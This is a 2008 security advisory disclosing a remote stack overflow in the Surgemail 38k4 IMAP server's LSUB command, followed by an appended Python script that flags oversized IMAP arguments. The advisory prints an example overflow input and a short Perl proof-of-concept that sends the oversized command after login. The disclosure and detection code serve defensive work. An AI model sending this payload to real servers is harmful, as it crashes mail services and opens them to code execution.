INFIGO-2008-03-07.txt

21 Mar 2008 00:00:00. Reported by Leon Juranic. Type: packetstorm. Source: packetstormsecurity.com

Advisory for a remote stack overflow in the Surgemail 38k4 IMAP server that allows remote code execution. It affects the latest available version and includes a PoC exploit. The vendor has released a patch.

`   
INFIGO IS Security Advisory #ADV-2008-03-07  
http://www.infigo.hr/en/  
  
  
  
  
Title: Surgemail 38k4 IMAP server remote stack overflow  
Advisory ID: INFIGO-2008-03-07  
Date: 2008-03-21  
Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-03-07  
Impact: Remote code execution  
Risk Level: High  
Vulnerability Type: Remote  
  
  
  
  
==[ Overview  
  
SurgeMail Mail Server Software Suite - combines advanced features, high  
performance and ease of use. Works on Windows, UNIX (Linux, Solaris etc.),  
Mac OSX, FreeBSD and others. Surgemail integrated email server is an  
Antispam Server, Antivirus Server, Webmail Server, Groupware Server,   
Blog Server and much more.   
  
  
  
==[ Vulnerability  
  
A remote vanilla stack overflow vulnerability exists in the Surgemail IMAP  
server. The vulnerability is caused by a boundary error in the IMAP  
server when it processes overly long arguments of the 'LSUB' command.  
The result is a simple stack overflow condition that can be  
trivially exploited.  
  
Example:  
a002 LSUB "//AA:" * 12000 + " " + "//AA:" * 21000 + "\r\n"  
  
  
  
==[ Affected Version  
  
The vulnerability has been identified in the latest available version, 38k4-4.  
It was tested on Windows XP SP2.  
  
  
  
==[ Fix  
  
The vendor has released a new version that fixes the vulnerability, available at  
http://www.netwinsite.com/surgemail/.  
  
  
  
==[ PoC Exploit  
  
http://www.infigo.hr/files/surgemail.pl  
  
#  
#  
# Surgemail stack overflow PoC exploit - latest version  
# Coded by Leon Juranic <[email protected]>  
# http://www.infigo.hr/en/  
#  
  
use IO::Socket;  
  
  
$host = "192.168.0.15";  
$user = "test";  
$pass = "test";  
$str = "//AA:";  
  
$sock = IO::Socket::INET->new(PeerAddr => $host,  
PeerPort => "143",  
Proto => "tcp") || die ("Cannot connect!!!\n");  
  
print $a = <$sock>;  
print $sock "a001 LOGIN $user $pass\r\n";  
print $a = <$sock>;  
print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";  
print $a = <$sock>;  
  
  
  
==[ Vendor status  
  
01.09.2008 - Initial contact  
01.10.2008 - Initial vendor response  
03.19.2008 - Vendor status update - Patch available  
03.21.2008 - Coordinated public disclosure  
  
  
  
==[ Credits  
  
Vulnerability discovered by Leon Juranic <[email protected]>.  
  
  
  
==[ INFIGO IS Security Contact  
  
INFIGO IS,  
  
WWW : http://www.infigo.hr/en/  
E-mail : [email protected]  
`
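A defensive check for the condition described under "Vulnerability", as an added example that is not part of the INFIGO advisory or of Surgemail: it inspects one IMAP client command line and reports oversized lines and oversized mailbox-name arguments, the kind of bound a proxy, IDS rule or log scanner can enforce in front of an unpatched server. The function name, both limits and the extension from LSUB to other mailbox-name commands are assumptions of this example.

```python
import re

# Assumed limits, not taken from the advisory; tune them to your own clients.
MAX_LINE = 8192   # octets in one command line
MAX_ARG = 1024    # octets in one mailbox-name argument
MAILBOX_CMDS = {b"LIST", b"LSUB", b"SUBSCRIBE", b"UNSUBSCRIBE", b"SELECT", b"EXAMINE"}

# One token: a quoted string (backslash escapes allowed) or a run of non-space octets.
TOKEN = re.compile(rb'"(?:[^"\\]|\\.)*"|[^ ]+')
# IMAP literal announcement such as {70000} or {70000+}; the data follows on later lines.
LITERAL = re.compile(rb"\{(\d+)\+?\}")


def inspect_imap_line(line: bytes) -> list[str]:
    """Return the reasons to reject or alert on one client command line."""
    findings = []
    body = line.rstrip(b"\r\n")
    if len(body) > MAX_LINE:
        findings.append(f"line is {len(body)} octets (limit {MAX_LINE})")
    tokens = TOKEN.findall(body)
    if len(tokens) < 3 or tokens[1].upper() not in MAILBOX_CMDS:
        return findings
    command = tokens[1].upper().decode()
    for index, arg in enumerate(tokens[2:], start=1):
        size = len(arg)
        literal = LITERAL.fullmatch(arg)
        if literal and size <= MAX_ARG:
            size = int(literal.group(1))  # judge a literal by its announced size
        if size > MAX_ARG:
            findings.append(f"{command} argument {index} is {size} octets (limit {MAX_ARG})")
    return findings


# Constructed sample lines; the second has arguments as long as those in the advisory.
SAMPLES = [
    b'a001 LSUB "" "*"\r\n',
    b"a002 LSUB " + b"x" * 60000 + b" " + b"x" * 105000 + b"\r\n",
    b"a003 LIST {70000}\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:24], inspect_imap_line(sample))
```

The check only sees what is on the wire, so it applies to plaintext IMAP on port 143 or to traffic after TLS termination.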
